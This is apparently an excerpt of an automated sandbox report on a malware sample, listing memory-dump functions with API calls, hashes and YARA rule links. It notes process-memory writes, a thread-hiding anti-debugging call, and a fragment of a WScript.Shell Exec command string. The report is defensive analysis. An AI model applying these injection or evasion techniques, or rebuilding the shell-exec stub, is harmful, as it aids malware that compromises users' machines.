                                  • Opcode ID: 46bb5e632a4ab8561b488d330152e350420cac212fc79b4990515ebf94814173
                                  • Instruction ID: c45cb4b854563c6985dbe92c4576d8802ebf73d421f41985ec2aefe172d91116
                                  • Opcode Fuzzy Hash: 46bb5e632a4ab8561b488d330152e350420cac212fc79b4990515ebf94814173
                                  • Instruction Fuzzy Hash: 0241FC70A22347ABFF10BEA00C817EA27564F54790FB08221DC495B1C8D2A5C89BCA82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02280ABA, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 945COMMON
                                  Download Yara Rule
                                  Strings
                                  • ateObject("WScript.Shell")Set C = W.Exec (", xrefs: 02285AF6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: ateObject("WScript.Shell")Set C = W.Exec ("
                                  • API String ID: 0-104302683
                                  • Opcode ID: 79939bdf0e5f9823333a89af58d2ff24bd304fef22f94185eae47a41440e6429
                                  • Instruction ID: 265638c9dd5607569b6d0a5d43a58217aacc5344b777b0e649a1d9fecc9c3a2a
                                  • Opcode Fuzzy Hash: 79939bdf0e5f9823333a89af58d2ff24bd304fef22f94185eae47a41440e6429
                                  • Instruction Fuzzy Hash: 14529A70632306AAEF317EE48D917F93757AF52350FA44126ED4A971CDD3A9C4CACA02
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02285796, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 422libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.NTDLL(00000000,?,00000041,00000252,?,02285BA4,?,?,?,00000852,?,?,000009D9,00000000,?,00400000), ref: 0228588D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: L
                                  • API String ID: 2994545307-2909332022
                                  • Opcode ID: b7c3f10638db252c563dae56805d9500ac085c71280e79aedba0441d9090a3e0
                                  • Instruction ID: 777dee61725702ce7c27f26b4e7128dfdd9a606c3fac074f9237eb5129ff2420
                                  • Opcode Fuzzy Hash: b7c3f10638db252c563dae56805d9500ac085c71280e79aedba0441d9090a3e0
                                  • Instruction Fuzzy Hash: 42D17975222306ABEB21BEA4CD907F53A63FF52754F604029FD869B2D8D3B8C485CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02280C12, Relevance: 3.7, APIs: 2, Instructions: 703COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d44fd84780994f2b1bd1386ba0674233fb0578c77587ab9b6e77c608c1c6da3
                                  • Instruction ID: 995d7d64281edde04072f0e5bbf36b1e14fc3384bc0fe8308eedff9b1a6ed2de
                                  • Opcode Fuzzy Hash: 6d44fd84780994f2b1bd1386ba0674233fb0578c77587ab9b6e77c608c1c6da3
                                  • Instruction Fuzzy Hash: 6112AB34672306AAFF3139D48D917F92667AF52750FA44019FD8A971CCD7B9C4CACA02
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228091B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 143COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 1.!T
                                  • API String ID: 0-3147410236
                                  • Opcode ID: 9ed373f060e52ffb39c2494dd75b107ddae27e3dc2327c9af008218ccee0dbf5
                                  • Instruction ID: 11bf661b7a835f2f1d4e4f776eb03984f1c37de8a439a667edeba7f060b604d7
                                  • Opcode Fuzzy Hash: 9ed373f060e52ffb39c2494dd75b107ddae27e3dc2327c9af008218ccee0dbf5
                                  • Instruction Fuzzy Hash: B931CEB09253478BFF00AD9058427F637214B163A0F758362CC09179C9E269CD6FCAD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02286E81, Relevance: 1.9, APIs: 1, Instructions: 430COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e9ef02b3cc6de76cde8145ea351334b9c20c1d88283eca1c6dbd1fe9cadeae29
                                  • Instruction ID: ecefd2fd4cc110ae698fad39d17f7fb1fc5236d1a94e6748ee8451578a17525b
                                  • Opcode Fuzzy Hash: e9ef02b3cc6de76cde8145ea351334b9c20c1d88283eca1c6dbd1fe9cadeae29
                                  • Instruction Fuzzy Hash: BCD15675261306ABEB21BE94CD90BF93663FF51754F604024FD4AAB2C8D3B8D885CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022837A9, Relevance: 1.9, APIs: 1, Instructions: 381COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fbcbb75aa55f4bc8897910018aaab163511ffc53c1076763565dd8d7b2a684f4
                                  • Instruction ID: 1de716e57c5aef592ebe7d71a2813f8ab6249f35b803674e0d153bba36b57eac
                                  • Opcode Fuzzy Hash: fbcbb75aa55f4bc8897910018aaab163511ffc53c1076763565dd8d7b2a684f4
                                  • Instruction Fuzzy Hash: 82B16575661307ABEB21BEA4CD91BF92663BF51754F604024FD4AAB2C8D3B8C4C9CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022837E7, Relevance: 1.9, APIs: 1, Instructions: 381nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: ae5a121744abd4d44b6a057854015c9afbe2026806b6d383da034e11c5c4997f
                                  • Instruction ID: 5baedeb9ca4e5e5c4862bfad7de953a43a2d040052927b754296bbcccfe4d0a2
                                  • Opcode Fuzzy Hash: ae5a121744abd4d44b6a057854015c9afbe2026806b6d383da034e11c5c4997f
                                  • Instruction Fuzzy Hash: CCB16575661307ABFB21BE94CD90BF92663BF51754F608124FD49AB2C8D3B8C486CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228384E, Relevance: 1.9, APIs: 1, Instructions: 362nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 61829be507eed9186357459d8e48d4f2852e2abcf54a0d88ce9d57c228dfbebd
                                  • Instruction ID: 2975b5f8260e1fa465152633669ee02256f1138ce51af93771344ff28fdcb4de
                                  • Opcode Fuzzy Hash: 61829be507eed9186357459d8e48d4f2852e2abcf54a0d88ce9d57c228dfbebd
                                  • Instruction Fuzzy Hash: EDB15574661307ABEB21BE94CD91BF92663BF51754F608025FD49AB2C8D3B8C4C6CA41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022838AA, Relevance: 1.8, APIs: 1, Instructions: 349nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: d026dc0f3ab743a3f14d1a76fc441786d2376d04769e9130dc3059dc982ba25e
                                  • Instruction ID: 0445cec38277a2042f31f2124a496e3a0bc7cfee5553d399e321c6c8da5daf5c
                                  • Opcode Fuzzy Hash: d026dc0f3ab743a3f14d1a76fc441786d2376d04769e9130dc3059dc982ba25e
                                  • Instruction Fuzzy Hash: FEA13674661307ABEB21BE94CD917F93662BF11754F604125FD4A9B2C8E3B8C4C6CA81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022838FA, Relevance: 1.8, APIs: 1, Instructions: 338nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 34f4a7304629272abb96fcea14e8e6407ffecbe2313ff2757588d5c65ae3a13c
                                  • Instruction ID: 94254d7eeb663f23a6d27000c713fa3351002350c6bcfff1ae2ae8a9243a5593
                                  • Opcode Fuzzy Hash: 34f4a7304629272abb96fcea14e8e6407ffecbe2313ff2757588d5c65ae3a13c
                                  • Instruction Fuzzy Hash: 56A14774661307ABEB21BE94CD917F93662FF11754F604125FD49AB2C8E3B8C4CACA41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022839A4, Relevance: 1.8, APIs: 1, Instructions: 308nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: e804117c3082c5d7fccc446d868ebc1d2515443ddbb473184f7978c514b9c46a
                                  • Instruction ID: c0d31ad887d19d0211efd10a4a49d28ed1dde4071acd4c9e3cf0e6a7c892111b
                                  • Opcode Fuzzy Hash: e804117c3082c5d7fccc446d868ebc1d2515443ddbb473184f7978c514b9c46a
                                  • Instruction Fuzzy Hash: B5914574661307ABEB21BE94CD917F93662FF11754F608125FD49AB2C8E3B8C4CACA41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283ADB, Relevance: 1.8, APIs: 1, Instructions: 305COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e540b7f0f792d3dd69b9f6774c9f0ab8e886fd0c5472cf7210a1a73bf3cbf653
                                  • Instruction ID: 4c61aaaf28516e09b5c6d4123ef9167feb20a2a55b7dfa75f5f0a85ec67a692d
                                  • Opcode Fuzzy Hash: e540b7f0f792d3dd69b9f6774c9f0ab8e886fd0c5472cf7210a1a73bf3cbf653
                                  • Instruction Fuzzy Hash: FA915674661307ABEB21BE94CD817F43662EF15750F604125FD89AB2C8D3B8C4C5CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283A2A, Relevance: 1.8, APIs: 1, Instructions: 300COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1d6c81846defa5074cd72d8bab907b051edfe99c33cb6b1110ae1a29b5400d8e
                                  • Instruction ID: 71f59c8d8fef2fbb03c6f9c4425e3c7c73c446989d7f13d6bc26e62be5cb3125
                                  • Opcode Fuzzy Hash: 1d6c81846defa5074cd72d8bab907b051edfe99c33cb6b1110ae1a29b5400d8e
                                  • Instruction Fuzzy Hash: 8B91337526130BABEB21BE90CD917F93662EF15754F604024FD8AAB2C8E3B8C4C5CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022839F6, Relevance: 1.8, APIs: 1, Instructions: 300nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: d3437fc5334e59266d34425dba2432d24dcf4e016a8cb51237902d467bd21276
                                  • Instruction ID: 4dba670e0367bc1b4685ec11bd7e3f4f00b80ce90a1b651db9edf77260951afb
                                  • Opcode Fuzzy Hash: d3437fc5334e59266d34425dba2432d24dcf4e016a8cb51237902d467bd21276
                                  • Instruction Fuzzy Hash: 88913674661307ABEF21BE90CD917F53662EF15754F608125FD4AAB2C8E3B8C4C6CA81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283A8D, Relevance: 1.8, APIs: 1, Instructions: 291nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 8bc92986f2338b4c603e182c02da452274eab615b4deaad18c16d72daf7dd915
                                  • Instruction ID: 198f4e6d727eb9463541a54e124a21fcfc71d600aa665e440b31b48a1e66d0bd
                                  • Opcode Fuzzy Hash: 8bc92986f2338b4c603e182c02da452274eab615b4deaad18c16d72daf7dd915
                                  • Instruction Fuzzy Hash: C6812674661307ABEF21BE90CD917F83662EB15754F604121FD49AB2D8E3F8C8C6CA41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283B1A, Relevance: 1.8, APIs: 1, Instructions: 275nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 8e4990b4cf70f65f55fb56d0cca7a64d24ffddd1ff9cbcbb7256df57d4476515
                                  • Instruction ID: a797378f4111d51c60c67e9ddc7db804541928a341428b41cf6b4cfac31e709d
                                  • Opcode Fuzzy Hash: 8e4990b4cf70f65f55fb56d0cca7a64d24ffddd1ff9cbcbb7256df57d4476515
                                  • Instruction Fuzzy Hash: E081267466130AABEF217D90CD917F83653EB15754F604121FD4AAB2D8E3F8C8DACA81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283A77, Relevance: 1.8, APIs: 1, Instructions: 273nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 5936391c464fc356adf475ef2b0c183f1ae86ed3538e9cd2b868675807734ca3
                                  • Instruction ID: 1ba74a1ecf9237a835920b4fdf401dff3fc10ac94c2c59a1769b7b75e5e19027
                                  • Opcode Fuzzy Hash: 5936391c464fc356adf475ef2b0c183f1ae86ed3538e9cd2b868675807734ca3
                                  • Instruction Fuzzy Hash: AF81127426130AABEB21BE94CD917F83662FF15754F604025FD89AB2D8D3B8D4C5CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283B7E, Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 9532b2cb788c385140830b29eaa7429799a98972afdd2b11eb89582d204198b9
                                  • Instruction ID: 42ccedcd3641335226eb722ae0bee82634fa1778203148f5baca5505cfc9b271
                                  • Opcode Fuzzy Hash: 9532b2cb788c385140830b29eaa7429799a98972afdd2b11eb89582d204198b9
                                  • Instruction Fuzzy Hash: 9371357466130BABEF317D94CD81BF83653AB15754F604021FD4AAB2D8E3E8C8DADA41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283BD9, Relevance: 1.7, APIs: 1, Instructions: 244nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 28abc340a63b9a4347e44891e647169066aab5d32bba0a3497a8f90faa0eb370
                                  • Instruction ID: 69a66a178c508a48fff1869dd7fdd9d5c2aa38c90df1ca1934cc056e79bd04c6
                                  • Opcode Fuzzy Hash: 28abc340a63b9a4347e44891e647169066aab5d32bba0a3497a8f90faa0eb370
                                  • Instruction Fuzzy Hash: C061467466130BABEF317D90DD817F43653AB15764F604021FD89AB2D8E3E8C8D6DA41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283C4E, Relevance: 1.7, APIs: 1, Instructions: 221nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 685e0141d9e55c35dab7914c681b5553abbad2cea1f816146ab865217b15a74d
                                  • Instruction ID: 1debad0403eeb193284aed4ecbabed57170782d5571e70b5483e77be0b7e733b
                                  • Opcode Fuzzy Hash: 685e0141d9e55c35dab7914c681b5553abbad2cea1f816146ab865217b15a74d
                                  • Instruction Fuzzy Hash: 3B51377466130BABEF21BD90CD817F43653EB15764F604021FD49AB2D8E7E8C8DADA81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283D5F, Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5bf6fe4bc5e2aa551e9a6eac2e28633d8083090ea80593ccb1b8208869000a2c
                                  • Instruction ID: 9a9caca4ece75bc4edb809e153f18e74861d7a2ce4dc904519bf979ec805d166
                                  • Opcode Fuzzy Hash: 5bf6fe4bc5e2aa551e9a6eac2e28633d8083090ea80593ccb1b8208869000a2c
                                  • Instruction Fuzzy Hash: 91516B78621347AFEF22BE90DC907F53B62AB15754F604021FD89561D8E3B8C8D6CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283CCA, Relevance: 1.7, APIs: 1, Instructions: 189nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: e0354fb91ab7e5adc2ba6dd2ca8e3cc2da6b9ab5d5b717a8f4131abcff147082
                                  • Instruction ID: f27f438573fec701d1faa8e061307d1ea360de81ee275a51f841649e8e474b9e
                                  • Opcode Fuzzy Hash: e0354fb91ab7e5adc2ba6dd2ca8e3cc2da6b9ab5d5b717a8f4131abcff147082
                                  • Instruction Fuzzy Hash: 38512778621307ABEF21BD90DD907F53663EB15764F604021FD49AB1D8E7B8C8DACA81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283D17, Relevance: 1.7, APIs: 1, Instructions: 181nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 1326a7b664f3cb7eab4dfb8e8663992fbcd5a73a8c6738247621cb41988539d6
                                  • Instruction ID: 5201e8981d4b3c0365d0617381b60e295938ac1ebddc8a03872961cd4a238676
                                  • Opcode Fuzzy Hash: 1326a7b664f3cb7eab4dfb8e8663992fbcd5a73a8c6738247621cb41988539d6
                                  • Instruction Fuzzy Hash: FA516B74621307ABEF21BD909C907F93763BB15354F604121FD49A71D8E7B8C8DACA82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283E16, Relevance: 1.6, APIs: 1, Instructions: 143nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: a8bd38897173514a20c41587ec34bab92815499227a98933f873a768b3f6fa01
                                  • Instruction ID: 624f19bfb26b1915991bb28ac855b0423ded4bc6bc587c51d022109bbe8439cf
                                  • Opcode Fuzzy Hash: a8bd38897173514a20c41587ec34bab92815499227a98933f873a768b3f6fa01
                                  • Instruction Fuzzy Hash: DC41687455130BABEF21BD90DD907F93763AB25390F608121FD496A1D8E7B8C49BCA81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228097A, Relevance: 1.6, APIs: 1, Instructions: 118nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: a4852d15978faa0f4f6b43954e813d66a4085e5a2cbd09f6b2feb9b473168c90
                                  • Instruction ID: fee8bc5181262f4933d98318f541e561b83e423624cd22ee12efe6e72aed0257
                                  • Opcode Fuzzy Hash: a4852d15978faa0f4f6b43954e813d66a4085e5a2cbd09f6b2feb9b473168c90
                                  • Instruction Fuzzy Hash: 173159A0A153879BFE00ADA068427EA3B1447563A0F798762CC0D17EC9E159C87FDAD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283EF2, Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: c253f55fd2fd83df645862c443da929429bb40074c5d0c7d613e9d6b4fbde2c8
                                  • Instruction ID: 94d71dd2875172a9cda2cfd5513e314f503372bc3af9ef022408696aa4ed2e42
                                  • Opcode Fuzzy Hash: c253f55fd2fd83df645862c443da929429bb40074c5d0c7d613e9d6b4fbde2c8
                                  • Instruction Fuzzy Hash: 85315B7461120B9BDF146D90CD807F93763FB15390F608221FD0957598E768C8ABCAC2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02280960, Relevance: 1.6, APIs: 1, Instructions: 98nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 5cd3ac52d52ba2261bf5761e07a0dd16a88028d5fd7c445a91e41bb29c89009c
                                  • Instruction ID: bf0fd616e3305bb85f45a0e49cf7ad1ea19d1481ab2f0fad76ead0a646a08ed4
                                  • Opcode Fuzzy Hash: 5cd3ac52d52ba2261bf5761e07a0dd16a88028d5fd7c445a91e41bb29c89009c
                                  • Instruction Fuzzy Hash: FC21BBA0A263479BFF107EE01C817EA37254B063A0F694325CC091B5C8D264C96FCAC2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283F62, Relevance: 1.6, APIs: 1, Instructions: 89nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 977743b66addb4585df80d51a9eb20d6c46b97b46f0911736bca0433641f17e2
                                  • Instruction ID: da3f6038df229b8406304559e40fcfe0211c4f23dee701063a4730f28c7c01bb
                                  • Opcode Fuzzy Hash: 977743b66addb4585df80d51a9eb20d6c46b97b46f0911736bca0433641f17e2
                                  • Instruction Fuzzy Hash: 5A2107B451020B9BDF146D9099907FA3B62BF15390F604221FD0E1B598E769C8ABDBD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283F22, Relevance: 1.6, APIs: 1, Instructions: 85nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00001000,00000040,?,00000000,?,?,00000000,00000000), ref: 02283FA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: c07db4ea220d0a3dbbdcbd71704b73fd0ccabe3d21eee164d70355b7ddbf92fe
                                  • Instruction ID: 5dd4b0aceefd1cb4e91bae902af28595de30e37900d3d83add3ea5cf4608d67f
                                  • Opcode Fuzzy Hash: c07db4ea220d0a3dbbdcbd71704b73fd0ccabe3d21eee164d70355b7ddbf92fe
                                  • Instruction Fuzzy Hash: 5221F1B852130AABDB257EA08D90BEA3AA3BF51390F544111FD455A198E7A9C484CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02284CF3, Relevance: 1.6, APIs: 1, Instructions: 67libraryCOMMON
                                  Download Yara Rule
                                  APIs
